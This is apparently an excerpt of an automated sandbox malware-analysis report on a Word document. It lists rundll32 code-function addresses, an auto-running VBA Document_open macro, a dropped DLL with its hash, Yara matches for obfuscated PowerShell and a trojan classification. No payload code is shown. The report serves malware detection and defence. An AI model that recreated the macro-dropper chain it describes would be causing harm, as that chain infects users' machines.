Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A1B46 8_2_001A1B46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B2B45 8_2_001B2B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AD760 8_2_001AD760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B4F60 8_2_001B4F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A2F97 8_2_001A2F97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AE380 8_2_001AE380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001BBFB0 8_2_001BBFB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AF3B5 8_2_001AF3B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A33AB 8_2_001A33AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A5BAC 8_2_001A5BAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AA7A2 8_2_001AA7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AB7C2 8_2_001AB7C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AABF8 8_2_001AABF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A77F0 8_2_001A77F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A27F4 8_2_001A27F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B9BE4 8_2_001B9BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00206C05 10_2_00206C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00206E8A 10_2_00206E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00204121 10_2_00204121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021533C 10_2_0021533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020FB04 10_2_0020FB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00209716 10_2_00209716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020E360 10_2_0020E360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215748 10_2_00215748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214DAD 10_2_00214DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C19B 10_2_0021C19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021A7E4 10_2_0021A7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002083F0 10_2_002083F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00204828 10_2_00204828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00201600 10_2_00201600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00213600 10_2_00213600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00203618 10_2_00203618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215060 10_2_00215060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210C65 10_2_00210C65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020D668 10_2_0020D668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020766F 10_2_0020766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020F471 10_2_0020F471
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00211C79 10_2_00211C79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218E79 10_2_00218E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020427A 10_2_0020427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212A7D 10_2_00212A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020884A 10_2_0020884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020D04B 10_2_0020D04B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00217A50 10_2_00217A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210EA0 10_2_00210EA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020C8A5 10_2_0020C8A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002172AE 10_2_002172AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002012B6 10_2_002012B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00206ABA 10_2_00206ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021D08F 10_2_0021D08F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021A094 10_2_0021A094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020F099 10_2_0020F099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020B0E1 10_2_0020B0E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219AE2 10_2_00219AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00207AE4 10_2_00207AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021A2EA 10_2_0021A2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020DEC9 10_2_0020DEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002168CB 10_2_002168CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020D2CE 10_2_0020D2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002112D1 10_2_002112D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002176D5 10_2_002176D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020E924 10_2_0020E924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020BB28 10_2_0020BB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020792C 10_2_0020792C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215D36 10_2_00215D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210705 10_2_00210705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00205D0E 10_2_00205D0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218313 10_2_00218313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212513 10_2_00212513
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215B60 10_2_00215B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218978 10_2_00218978
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00206342 10_2_00206342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00213745 10_2_00213745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00202746 10_2_00202746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00208F55 10_2_00208F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020DB5B 10_2_0020DB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C95E 10_2_0021C95E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00204D5F 10_2_00204D5F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002081A0 10_2_002081A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020B3A2 10_2_0020B3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00203FAB 10_2_00203FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002067AC 10_2_002067AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021CBB0 10_2_0021CBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020FFB5 10_2_0020FFB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002059B8 10_2_002059B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020EF80 10_2_0020EF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00208994 10_2_00208994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00203B97 10_2_00203B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021B19F 10_2_0021B19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002139E1 10_2_002139E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002033F4 10_2_002033F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020B7F8 10_2_0020B7F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020C3C2 10_2_0020C3C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A4460 11_2_006A4460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A0065 11_2_006A0065
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A1079 11_2_006A1079
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069E871 11_2_0069E871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069C44B 11_2_0069C44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00697C4A 11_2_00697C4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00693C28 11_2_00693C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00696005 11_2_00696005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069A4E1 11_2_0069A4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A5CCB 11_2_006A5CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069BCA5 11_2_0069BCA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006AC48F 11_2_006AC48F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069E499 11_2_0069E499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A9494 11_2_006A9494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A7D78 11_2_006A7D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006ABD5E 11_2_006ABD5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069415F 11_2_0069415F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00696D2C 11_2_00696D2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00693521 11_2_00693521
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069DD24 11_2_0069DD24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A5136 11_2_006A5136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069510E 11_2_0069510E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A1913 11_2_006A1913
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A2DE1 11_2_006A2DE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A41AD 11_2_006A41AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006975A0 11_2_006975A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00694DB8 11_2_00694DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006AB59B 11_2_006AB59B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006AA59F 11_2_006AA59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00697D94 11_2_00697D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069CA68 11_2_0069CA68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00696A6F 11_2_00696A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069367A 11_2_0069367A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A8279 11_2_006A8279
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A1E7D 11_2_006A1E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A6E50 11_2_006A6E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00690A00 11_2_00690A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A2A00 11_2_006A2A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006B1600 11_2_006B1600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00692A18 11_2_00692A18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A96EA 11_2_006A96EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A8EE2 11_2_006A8EE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00696EE4 11_2_00696EE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069D2C9 11_2_0069D2C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069C6CE 11_2_0069C6CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A06D1 11_2_006A06D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A6AD5 11_2_006A6AD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A66AE 11_2_006A66AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A02A0 11_2_006A02A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00695EBA 11_2_00695EBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006B12B6 11_2_006B12B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006906B6 11_2_006906B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069628A 11_2_0069628A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069D760 11_2_0069D760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A4F60 11_2_006A4F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A4B48 11_2_006A4B48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00695742 11_2_00695742
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00691B46 11_2_00691B46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A2B45 11_2_006A2B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069CF5B 11_2_0069CF5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00698355 11_2_00698355
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069AF28 11_2_0069AF28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A473C 11_2_006A473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069FB05 11_2_0069FB05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069EF04 11_2_0069EF04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A7713 11_2_006A7713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00698B16 11_2_00698B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A9BE4 11_2_006A9BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069ABF8 11_2_0069ABF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006977F0 11_2_006977F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006927F4 11_2_006927F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069B7C2 11_2_0069B7C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006933AB 11_2_006933AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00695BAC 11_2_00695BAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069A7A2 11_2_0069A7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006ABFB0 11_2_006ABFB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069F3B5 11_2_0069F3B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0069E380 11_2_0069E380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00692F97 11_2_00692F97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00716C05 12_2_00716C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00716E8A 12_2_00716E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071E360 12_2_0071E360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00725748 12_2_00725748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072533C 12_2_0072533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00714121 12_2_00714121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00719716 12_2_00719716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071FB04 12_2_0071FB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007183F0 12_2_007183F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072A7E4 12_2_0072A7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00724DAD 12_2_00724DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072C19B 12_2_0072C19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071F471 12_2_0071F471
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00721C79 12_2_00721C79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071427A 12_2_0071427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00728E79 12_2_00728E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00722A7D 12_2_00722A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00725060 12_2_00725060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00720C65 12_2_00720C65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071D668 12_2_0071D668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071766F 12_2_0071766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00727A50 12_2_00727A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071D04B 12_2_0071D04B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071884A 12_2_0071884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00714828 12_2_00714828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00713618 12_2_00713618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00711600 12_2_00711600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00723600 12_2_00723600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00729AE2 12_2_00729AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071B0E1 12_2_0071B0E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00717AE4 12_2_00717AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072A2EA 12_2_0072A2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007212D1 12_2_007212D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007276D5 12_2_007276D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071DEC9 12_2_0071DEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007268CB 12_2_007268CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071D2CE 12_2_0071D2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007112B6 12_2_007112B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00716ABA 12_2_00716ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00720EA0 12_2_00720EA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071C8A5 12_2_0071C8A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007272AE 12_2_007272AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072A094 12_2_0072A094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071F099 12_2_0071F099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072D08F 12_2_0072D08F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00728978 12_2_00728978
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00725B60 12_2_00725B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00718F55 12_2_00718F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071DB5B 12_2_0071DB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072C95E 12_2_0072C95E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00714D5F 12_2_00714D5F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00716342 12_2_00716342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00712746 12_2_00712746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00723745 12_2_00723745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00725D36 12_2_00725D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071E924 12_2_0071E924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071BB28 12_2_0071BB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0071792C 12_2_0071792C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00728313 12_2_00728313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00722513 12_2_00722513
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00720705 12_2_00720705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00715D0E 12_2_00715D0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007133F4 12_2_007133F4
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Doc.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module R4bm01nsbtdt1, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Doc.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll 5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1000B078 appears 46 times
Yara signature match
Source: 00000005.00000002.2093207161.0000000001CB4000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2093170388.00000000002B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Yvtlx6p4.dll.5.dr Static PE information: Section: .rsrc ZLIB complexity 0.999343417553
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@30/9@1/4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002E6686 CreateToolhelp32Snapshot, 17_2_002E6686
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$Doc.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmp Jump to behavior
Source: Doc.doc OLE indicator, Word Document stream: true
Source: Doc.doc OLE document summary: title field not present or empty
Source: Doc.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............,........................... .<.......<.....................H...............#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............,...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ..............................}..v....X.......0.r...............~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................f..j....................................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................f..j......~.............................}..v............0.r.............8.~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....................................}..v....X.......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... ..............................}..v............0.r...............~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....H~.............................}..v....X.......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............&..j....................................}..v............0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....H~.............................}..v....X.......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............&..j....................................}..v............0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....H~.............................}..v....X.......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............&..j....................................}..v............0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.r.............XE~.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[...............&..j....`...............................}..v............0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.2.............}..v............0.r.............XE~.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g...............&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
